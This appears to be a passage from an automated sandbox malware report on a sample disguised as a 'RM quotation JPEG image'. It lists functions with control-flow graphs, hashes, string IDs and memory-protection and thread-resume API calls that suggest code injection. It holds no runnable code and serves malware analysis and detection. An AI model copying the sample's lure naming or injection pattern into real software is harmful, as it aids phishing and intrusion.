                          • Opcode Fuzzy Hash: 17b26753d4421c353e0825bfaf234ae0ec5b83048155294e1c8210a3dc05366c
                          • Instruction Fuzzy Hash: 02A2B675E00228DFDB65CF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF40
                          Function 01410D21 Relevance: 3.1, Strings: 2, Instructions: 611COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1162 1410d21-1410da7 1164 1410da9 1162->1164 1165 1410dae-1410dc6 1162->1165 1164->1165 1167 14113c2-14113df 1165->1167 1168 1410dcc-1410fa4 1165->1168 1171 1411463-14114ab 1167->1171 1172 14113e5-1411405 1167->1172 1230 1410fa6-1410fdc 1168->1230 1231 1410fde-1410fe0 1168->1231 1183 14114bd-14114c5 1171->1183 1184 14114ad-14114b8 1171->1184 1177 14116a7 1172->1177 1178 141140b-1411413 1172->1178 1182 14116ac-14116b5 1177->1182 1178->1177 1180 1411419-141142e 1178->1180 1180->1177 1181 1411434-141145e call 1410228 1180->1181 1181->1182 1187 14116c2 1182->1187 1188 14116b7 1182->1188 1190 14114c7-14114e8 1183->1190 1191 14114ea 1183->1191 1189 1411560-14115aa 1184->1189 1196 14116c3 1187->1196 1188->1187 1201 14115b0-14115dc 1189->1201 1202 141163b-14116a5 1189->1202 1193 14114f1-14114f3 1190->1193 1191->1193 1198 14114f5-14114fd 1193->1198 1199 14114ff-141151f 1193->1199 1196->1196 1198->1189 1199->1189 1206 1411521-141152a 1199->1206 1201->1177 1209 14115e2-14115e9 1201->1209 1202->1182 1206->1177 1208 1411530-141155e 1206->1208 1208->1189 1208->1206 1209->1177 1211 14115ef-14115fb 1209->1211 1211->1177 1212 1411601-141160d 1211->1212 1212->1177 1214 1411613-1411639 1212->1214 1214->1182 1230->1231 1232 1410fe2-1410fe4 1231->1232 1233 1410fe6-1410ff0 1231->1233 1235 1410ff2-1411008 1232->1235 1233->1235 1236 141100a-141100c 1235->1236 1237 141100e-1411016 1235->1237 1239 1411018-1411020 1236->1239 1237->1239 1241 1411022-1411031 1239->1241 1242 1411037-141105e 1239->1242 1241->1242 1246 1411060-141106d 1242->1246 1247 141109a-14110a4 1242->1247 1246->1247 1252 141106f-141107c 1246->1252 1248 14110a6 1247->1248 1249 14110ad-1411133 1247->1249 1248->1249 1261 1411135-1411172 1249->1261 1262 1411174-1411182 1249->1262 1255 1411082-1411095 1252->1255 1256 141107e-1411080 1252->1256 1255->1247 1256->1247 1265 141118d-14111c9 1261->1265 1262->1265 1282 14111cf call 1412001 1265->1282 1283 14111cf call 1412010 1265->1283 1269 14111d5-141129b 1274 14112c9-14112e5 1269->1274 1275 141129d-14112b9 1269->1275 1278 14112f3-14112f4 1274->1278 1279 14112e7 1274->1279 1280 14112c5-14112c7 1275->1280 1278->1167 1279->1278 1280->1274 1280->1275 1282->1269 1283->1269
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: 039cd134f9a0327ae580290e723011d1fe26277fb39eb1e05f53229b68ee517f
                          • Instruction ID: d097e8f2af4d1a6ca157add6ca4bb5263d614cb78cb0888a8f004ed56c72a453
                          • Opcode Fuzzy Hash: 039cd134f9a0327ae580290e723011d1fe26277fb39eb1e05f53229b68ee517f
                          • Instruction Fuzzy Hash: E4425E74A116198FDB14CF79E884AAEB7F2FF88300F15856AD409EB359DB34A941CF90
                          Function 0650E1B0 Relevance: 3.0, Strings: 2, Instructions: 543COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1525 650e1b0-650e1d1 1526 650e1d3 1525->1526 1527 650e1d8-650e270 call 650eae8 1525->1527 1526->1527 1531 650e276-650e2ad 1527->1531 1533 650e2bc 1531->1533 1534 650e2af-650e2ba 1531->1534 1535 650e2c6-650e398 1533->1535 1534->1535 1544 650e3aa-650e3d5 1535->1544 1545 650e39a-650e3a0 1535->1545 1546 650ea4b-650ea67 1544->1546 1545->1544 1547 650e3da-650e503 1546->1547 1548 650ea6d-650ea88 1546->1548 1557 650e515-650e66d 1547->1557 1558 650e505-650e50b 1547->1558 1566 650e6c6-650e6cd 1557->1566 1567 650e66f-650e673 1557->1567 1558->1557 1568 650e878-650e894 1566->1568 1569 650e675-650e676 1567->1569 1570 650e67b-650e6c1 1567->1570 1571 650e6d2-650e7c0 1568->1571 1572 650e89a-650e8be 1568->1572 1573 650e908-650e957 1569->1573 1570->1573 1597 650e874-650e875 1571->1597 1598 650e7c6-650e871 1571->1598 1578 650e8c0-650e902 1572->1578 1579 650e905-650e906 1572->1579 1586 650e969-650e9b4 1573->1586 1587 650e959-650e95f 1573->1587 1578->1579 1579->1573 1590 650e9b6-650ea2c 1586->1590 1591 650ea2d-650ea48 1586->1591 1587->1586 1590->1591 1591->1546 1597->1568 1598->1597
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: fjq$8
                          • API String ID: 0-2019453504
                          • Opcode ID: a363b186041e311057b19b449d835dc6ed767ab9f84a7e287b9675703c36839a
                          • Instruction ID: bb9bd97b875c5e312828a359218938356e09684ccd6579436a8e2a6aaa4b7a74
                          • Opcode Fuzzy Hash: a363b186041e311057b19b449d835dc6ed767ab9f84a7e287b9675703c36839a
                          • Instruction Fuzzy Hash: CA42C271D00629CBDB64CF69C950AD9F7B2BF89310F5486EAD40DA7254EB30AE85CF90
                          Function 01410D6A Relevance: 2.9, Strings: 2, Instructions: 375COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1758 1410d6a-1410d80 1760 1410d82-1410d8c 1758->1760 1761 1410d8d-1410da7 1758->1761 1762 1410da9 1761->1762 1763 1410dae-1410dc6 1761->1763 1762->1763 1765 14113c2-14113df 1763->1765 1766 1410dcc-1410fa4 1763->1766 1769 1411463-14114ab 1765->1769 1770 14113e5-1411405 1765->1770 1828 1410fa6-1410fdc 1766->1828 1829 1410fde-1410fe0 1766->1829 1781 14114bd-14114c5 1769->1781 1782 14114ad-14114b8 1769->1782 1775 14116a7 1770->1775 1776 141140b-1411413 1770->1776 1780 14116ac-14116b5 1775->1780 1776->1775 1778 1411419-141142e 1776->1778 1778->1775 1779 1411434-141145e call 1410228 1778->1779 1779->1780 1785 14116c2 1780->1785 1786 14116b7 1780->1786 1788 14114c7-14114e8 1781->1788 1789 14114ea 1781->1789 1787 1411560-14115aa 1782->1787 1794 14116c3 1785->1794 1786->1785 1799 14115b0-14115dc 1787->1799 1800 141163b-14116a5 1787->1800 1791 14114f1-14114f3 1788->1791 1789->1791 1796 14114f5-14114fd 1791->1796 1797 14114ff-141151f 1791->1797 1794->1794 1796->1787 1797->1787 1804 1411521-141152a 1797->1804 1799->1775 1807 14115e2-14115e9 1799->1807 1800->1780 1804->1775 1806 1411530-141155e 1804->1806 1806->1787 1806->1804 1807->1775 1809 14115ef-14115fb 1807->1809 1809->1775 1810 1411601-141160d 1809->1810 1810->1775 1812 1411613-1411639 1810->1812 1812->1780 1828->1829 1830 1410fe2-1410fe4 1829->1830 1831 1410fe6-1410ff0 1829->1831 1833 1410ff2-1411008 1830->1833 1831->1833 1834 141100a-141100c 1833->1834 1835 141100e-1411016 1833->1835 1837 1411018-1411020 1834->1837 1835->1837 1839 1411022-1411031 1837->1839 1840 1411037-141105e 1837->1840 1839->1840 1844 1411060-141106d 1840->1844 1845 141109a-14110a4 1840->1845 1844->1845 1850 141106f-141107c 1844->1850 1846 14110a6 1845->1846 1847 14110ad-1411133 1845->1847 1846->1847 1859 1411135-1411172 1847->1859 1860 1411174-1411182 1847->1860 1853 1411082-1411095 1850->1853 1854 141107e-1411080 1850->1854 1853->1845 1854->1845 1863 141118d-14111c9 1859->1863 1860->1863 1880 14111cf call 1412001 1863->1880 1881 14111cf call 1412010 1863->1881 1867 14111d5-141129b 1872 14112c9-14112e5 1867->1872 1873 141129d-14112b9 1867->1873 1876 14112f3-14112f4 1872->1876 1877 14112e7 1872->1877 1878 14112c5-14112c7 1873->1878 1876->1765 1877->1876 1878->1872 1878->1873 1880->1867 1881->1867
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: 2c633b21849a43415dc6ad52f19df2d5172a6ef4452d3024b95c81aded3fcddc
                          • Instruction ID: 467661b7ed63057923d4190a0bfa719931cc12ef6d24126e19a434681658a093
                          • Opcode Fuzzy Hash: 2c633b21849a43415dc6ad52f19df2d5172a6ef4452d3024b95c81aded3fcddc
                          • Instruction Fuzzy Hash: A3E17E75E005299FDB24DF79E844AAEB7F2FF88300F118669D409EB359DB34A941CB90
                          Function 01410DE1 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2093 1410de1-1410fa4 2116 1410fa6-1410fdc 2093->2116 2117 1410fde-1410fe0 2093->2117 2116->2117 2118 1410fe2-1410fe4 2117->2118 2119 1410fe6-1410ff0 2117->2119 2121 1410ff2-1411008 2118->2121 2119->2121 2122 141100a-141100c 2121->2122 2123 141100e-1411016 2121->2123 2125 1411018-1411020 2122->2125 2123->2125 2127 1411022-1411031 2125->2127 2128 1411037-141105e 2125->2128 2127->2128 2132 1411060-141106d 2128->2132 2133 141109a-14110a4 2128->2133 2132->2133 2138 141106f-141107c 2132->2138 2134 14110a6 2133->2134 2135 14110ad-1411133 2133->2135 2134->2135 2147 1411135-1411172 2135->2147 2148 1411174-1411182 2135->2148 2141 1411082-1411095 2138->2141 2142 141107e-1411080 2138->2142 2141->2133 2142->2133 2151 141118d-14111c9 2147->2151 2148->2151 2206 14111cf call 1412001 2151->2206 2207 14111cf call 1412010 2151->2207 2155 14111d5-141129b 2160 14112c9-14112e5 2155->2160 2161 141129d-14112b9 2155->2161 2164 14112f3-14113df 2160->2164 2165 14112e7 2160->2165 2166 14112c5-14112c7 2161->2166 2170 1411463-14114ab 2164->2170 2171 14113e5-1411405 2164->2171 2165->2164 2166->2160 2166->2161 2180 14114bd-14114c5 2170->2180 2181 14114ad-14114b8 2170->2181 2174 14116a7 2171->2174 2175 141140b-1411413 2171->2175 2179 14116ac-14116b5 2174->2179 2175->2174 2177 1411419-141142e 2175->2177 2177->2174 2178 1411434-141145e call 1410228 2177->2178 2178->2179 2183 14116c2 2179->2183 2184 14116b7 2179->2184 2186 14114c7-14114e8 2180->2186 2187 14114ea 2180->2187 2185 1411560-14115aa 2181->2185 2191 14116c3 2183->2191 2184->2183 2195 14115b0-14115dc 2185->2195 2196 141163b-14116a5 2185->2196 2189 14114f1-14114f3 2186->2189 2187->2189 2193 14114f5-14114fd 2189->2193 2194 14114ff-141151f 2189->2194 2191->2191 2193->2185 2194->2185 2199 1411521-141152a 2194->2199 2195->2174 2202 14115e2-14115e9 2195->2202 2196->2179 2199->2174 2201 1411530-141155e 2199->2201 2201->2185 2201->2199 2202->2174 2203 14115ef-14115fb 2202->2203 2203->2174 2204 1411601-141160d 2203->2204 2204->2174 2205 1411613-1411639 2204->2205 2205->2179 2206->2155 2207->2155
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: 2ca364e3b50e456f18a1ec689fb2534a71f10fa7a001058d90ff6aedea80d029
                          • Instruction ID: 3023f22b4d4de82571db2221cc25f3950adb2326bd76e9e045a53ce4b3d95191
                          • Opcode Fuzzy Hash: 2ca364e3b50e456f18a1ec689fb2534a71f10fa7a001058d90ff6aedea80d029
                          • Instruction Fuzzy Hash: E4D17E75E005298FDB24DF79E844AAEB7F2BFC8300F158669D409EB359DB34A941CB90
                          Function 01412322 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2208 1412322-1412360 2213 1412371 call 1411f30 2208->2213 2214 1412362-1412370 2208->2214 2216 1412376-1412378 2213->2216 2217 1412389-14123a3 2216->2217 2218 141237a-1412388 2216->2218 2220 14123a9-14123b6 2217->2220 2221 141248e-1412516 2217->2221 2220->2221 2222 14123bc-14123c6 2220->2222 2222->2221 2224 14123cc-14123d6 2222->2224 2224->2221 2225 14123dc-14123f6 2224->2225 2227 14123f9-1412417 2225->2227 2227->2221 2228 1412419-141243e 2227->2228 2228->2221 2230 1412440-1412452 2228->2230 2230->2227 2231 1412454-1412456 2230->2231 2233 1412459-141245e 2231->2233 2233->2221 2234 1412460-141246a 2233->2234 2234->2233 2236 141246c-141248d 2234->2236
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: $vW+`
                          • API String ID: 0-2655680021
                          • Opcode ID: 0fff5cdccf7558cdc45edc52929305e4d554fbadcd3b638e55a1ebaa70b1ecc8
                          • Instruction ID: 1f581506f70ec65c6fdb3805874cdafc2b3a6c2f49256dfca4428a60689461d4
                          • Opcode Fuzzy Hash: 0fff5cdccf7558cdc45edc52929305e4d554fbadcd3b638e55a1ebaa70b1ecc8
                          • Instruction Fuzzy Hash: 1751E271B101058FCB15CBBDD88496EBBF2FBC8210729857AD505DB769EB30EC018790
                          Function 0650E1A1 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2300 650e1a1-650e1d1 2301 650e1d3 2300->2301 2302 650e1d8-650e270 call 650eae8 2300->2302 2301->2302 2306 650e276-650e2ad 2302->2306 2308 650e2bc 2306->2308 2309 650e2af-650e2ba 2306->2309 2310 650e2c6-650e398 2308->2310 2309->2310 2319 650e3aa-650e3d5 2310->2319 2320 650e39a-650e3a0 2310->2320 2321 650ea4b-650ea67 2319->2321 2320->2319 2322 650e3da-650e503 2321->2322 2323 650ea6d-650ea88 2321->2323 2332 650e515-650e66d 2322->2332 2333 650e505-650e50b 2322->2333 2341 650e6c6-650e6cd 2332->2341 2342 650e66f-650e673 2332->2342 2333->2332 2343 650e878-650e894 2341->2343 2344 650e675-650e676 2342->2344 2345 650e67b-650e6c1 2342->2345 2346 650e6d2-650e7c0 2343->2346 2347 650e89a-650e8be 2343->2347 2348 650e908-650e957 2344->2348 2345->2348 2372 650e874-650e875 2346->2372 2373 650e7c6-650e871 2346->2373 2353 650e8c0-650e902 2347->2353 2354 650e905-650e906 2347->2354 2361 650e969-650e9b4 2348->2361 2362 650e959-650e95f 2348->2362 2353->2354 2354->2348 2365 650e9b6-650ea2c 2361->2365 2366 650ea2d-650ea48 2361->2366 2362->2361 2365->2366 2366->2321 2372->2343 2373->2372
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: fjq$h
                          • API String ID: 0-322255796
                          • Opcode ID: 588eea92f7548570f0dd5c6993b6258b509235a88563e97fb1777280dea3d137
                          • Instruction ID: a05853fd014f164528550c8a5b752dd764f4aa4cd500f4bb0f9879bfc8aa7760
                          • Opcode Fuzzy Hash: 588eea92f7548570f0dd5c6993b6258b509235a88563e97fb1777280dea3d137
                          • Instruction Fuzzy Hash: 3461E671D006299BEB64CF6ACC40BD9FBB2BF89310F54C6AAD40DA7254DB305A85CF50
                          Function 063E0040 Relevance: 2.2, Strings: 1, Instructions: 959COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2
                          • API String ID: 0-450215437
                          • Opcode ID: 12dabbf3eb23e8781e257832027622bef32f11cd9b1cd267388aacc0997f0bf3
                          • Instruction ID: 1caf96cc87caac8b2edd2760eaef24bcad05eab57933a5ebdef906315c94495f
                          • Opcode Fuzzy Hash: 12dabbf3eb23e8781e257832027622bef32f11cd9b1cd267388aacc0997f0bf3
                          • Instruction Fuzzy Hash: 15B2B3B4E012298FDB65DF68C884B9DBBB6FF88300F1081EAD509A7255DB749E85CF50
                          Function 06504C38 Relevance: 1.9, Strings: 1, Instructions: 614COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq
                          • API String ID: 0-3943945277
                          • Opcode ID: bf2c5bddd5f574e6b0fe52ea39b9dcbe6710cff2e155f191962d7bb15d94cf90
                          • Instruction ID: 589b48c4b09d7795aa5a1d81e5b7b8b020bdac98efbe5776263809d83966a459
                          • Opcode Fuzzy Hash: bf2c5bddd5f574e6b0fe52ea39b9dcbe6710cff2e155f191962d7bb15d94cf90
                          • Instruction Fuzzy Hash: 1E326770A002168FEB98DFA9C59466EFBF2FF88300F148929D55AD7380DB34E945CB94
                          Function 014116C5 Relevance: 1.6, Strings: 1, Instructions: 391COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq
                          • API String ID: 0-2687900687
                          • Opcode ID: 4f74f61ef048a08bda40769e1b81260145127093a35fa9c0904c06e145ffd10a
                          • Instruction ID: 1222b7db9eb767bdf6b778bfddd4d77e2b7953ee501326a9491aedfd1ee494f9
                          • Opcode Fuzzy Hash: 4f74f61ef048a08bda40769e1b81260145127093a35fa9c0904c06e145ffd10a
                          • Instruction Fuzzy Hash: 90F18F71E002698FDB15CF69C984AADFBF2BF89300F19C19AD119AB266D7349D81CF50
                          Function 06547FB8 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Teeq
                          • API String ID: 0-348098666
                          • Opcode ID: 5d6773d042a3482d73fdab10bc40001a96408438406f1842f72303f9b988d65e
                          • Instruction ID: ccaef11f8821c6e0ae12031f939c2c3f59f88303768557b02c6d570197a29feb
                          • Opcode Fuzzy Hash: 5d6773d042a3482d73fdab10bc40001a96408438406f1842f72303f9b988d65e
                          • Instruction Fuzzy Hash: 86F1E170E05219CFEBA4DF69D884BADBBB6BB49304F1084EAD40DA7255DB709E85CF01
                          Function 06547FA9 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Teeq
                          • API String ID: 0-348098666
                          • Opcode ID: c79c65d0c8426aa1bca95fc3e058a5cf3c8952c8159542a7232ffd83f08bc911
                          • Instruction ID: be958fa64793d9726413f48a872ddd4e0da1e62ffa49770c4a83e28a1325ba6f
                          • Opcode Fuzzy Hash: c79c65d0c8426aa1bca95fc3e058a5cf3c8952c8159542a7232ffd83f08bc911
                          • Instruction Fuzzy Hash: C4F1D174E01219CFEBA4DF69D848BADBBB2BB49304F1484EAD40DA7255DB709E85CF01
                          Function 064F14F0 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 064F15AD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: dba7247a5060ce3f991c35751ae0d81cc6f0f15c7511c39a85c6c4012ee43e0e
                          • Instruction ID: e61345b63dff67065223748eb2c4c042b13abaf296e1caee2f77928bf2f2a0e9
                          • Opcode Fuzzy Hash: dba7247a5060ce3f991c35751ae0d81cc6f0f15c7511c39a85c6c4012ee43e0e
                          • Instruction Fuzzy Hash: 884196B9D002589FCF10CFA9D984ADEFBB1BB49310F10A42AE919B7210D735A942CF64
                          Function 064F14F8 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 064F15AD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: 4ab02699c76268db87b8b1b26aa0d8cd72199de2bef455e1025b17aeee8f51f5
                          • Instruction ID: 96ab2d21fd35cb4a27e8603a6ac914d0c1e329123023dd0aaacbd0d3f69bb869
                          • Opcode Fuzzy Hash: 4ab02699c76268db87b8b1b26aa0d8cd72199de2bef455e1025b17aeee8f51f5
                          • Instruction Fuzzy Hash: 604186B9D002589FCF10CFAAD984A9EFBB5BB49310F10A42AE919B7210D735A945CF64
                          Function 064F2A29 Relevance: 1.6, APIs: 1, Instructions: 85nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtResumeThread.NTDLL(?,?), ref: 064F2ABE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 3fba62a142d3f2cfc6c7d44e435835561e11101381f9c02626a3e1f034043102
                          • Instruction ID: f92281851b8e7a59e43e0371e4097584bdc7abe4ee00bfd9addc3d3447a3de69
                          • Opcode Fuzzy Hash: 3fba62a142d3f2cfc6c7d44e435835561e11101381f9c02626a3e1f034043102
                          • Instruction Fuzzy Hash: 3A31CAB5D012189FCB10CFA9D984AAEFBF5FB49310F24942AE919B7300C775A945CFA4
                          Function 064F2A30 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtResumeThread.NTDLL(?,?), ref: 064F2ABE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: dc0768ae7889ad4e5bfea7f06fb08b8e0a83b6418c0c9aaf7c40272112585006
                          • Instruction ID: fe320ffe3f331f5d558ad40367e10e7e7c61d3a4514cff1538196d2cf83d5de8
                          • Opcode Fuzzy Hash: dc0768ae7889ad4e5bfea7f06fb08b8e0a83b6418c0c9aaf7c40272112585006
                          • Instruction Fuzzy Hash: 3531A9B5D012189FCB10CFA9D984AAEFBF5FB49310F14942AE919B7300C775AA45CFA4
                          Function 0650A4F0 Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: PHeq
                          • API String ID: 0-2873676430
                          • Opcode ID: 3fcb08fd47691d7538f68e31b82afc09594ad56676d445b3ea8d30f925c7397e
                          • Instruction ID: 2ba38855911817b44b3158a3293034f3fde13c6afaecc085d8a6044a4d8d82af
                          • Opcode Fuzzy Hash: 3fcb08fd47691d7538f68e31b82afc09594ad56676d445b3ea8d30f925c7397e
                          • Instruction Fuzzy Hash: 35C1C474E05308CFEB64CFA9D544BADBBF2BF49310F2484A9D409AB296DB749985CF40
                          Function 0650A548 Relevance: 1.5, Strings: 1, Instructions: 286COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: PHeq
                          • API String ID: 0-2873676430
                          • Opcode ID: 60ae832997a43d03aeab937656266e64f444a7458a095098d1bad7b69b7b81f0
                          • Instruction ID: dc196d9eef3fcaad8c2582d2838a976ef4010fb6d7de6895c3b52fb2c0c87c80
                          • Opcode Fuzzy Hash: 60ae832997a43d03aeab937656266e64f444a7458a095098d1bad7b69b7b81f0
                          • Instruction Fuzzy Hash: B8C1D370E05318CFEBA4CFA9D544BADBBF6BF49310F1094A9D409AB296DB748985CF40
                          Function 0650A538 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: PHeq
                          • API String ID: 0-2873676430
                          • Opcode ID: de5cac07f073113a7ac3de7916d3d021ee2353905e39a309f6bde45a8bead709
                          • Instruction ID: 29a88e8d0f2193504ee3aa91107aae1904120a285043830eb7256cfcaf262028
                          • Opcode Fuzzy Hash: de5cac07f073113a7ac3de7916d3d021ee2353905e39a309f6bde45a8bead709
                          • Instruction Fuzzy Hash: BAC1C274E05318CFEB64CFA9D544B9DBBF2BF49310F2094A9D409AB296DB748985CF40
                          Function 0684DBE8 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dlq
                          • API String ID: 0-3914526553
                          • Opcode ID: 506a1bc56954a1835d175a8c6beb7258b21cb6678d644c183051392f725976e3
                          • Instruction ID: 769193c4b37a861be53052f714288017774aff06492e4c9de5b23ee6122b3fee
                          • Opcode Fuzzy Hash: 506a1bc56954a1835d175a8c6beb7258b21cb6678d644c183051392f725976e3
                          • Instruction Fuzzy Hash: 42D1C174E01218DFDB54DFA9D994A9DBBB2FF88300F1081A9E409AB365DB35AD81CF50
                          Function 014117C6 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
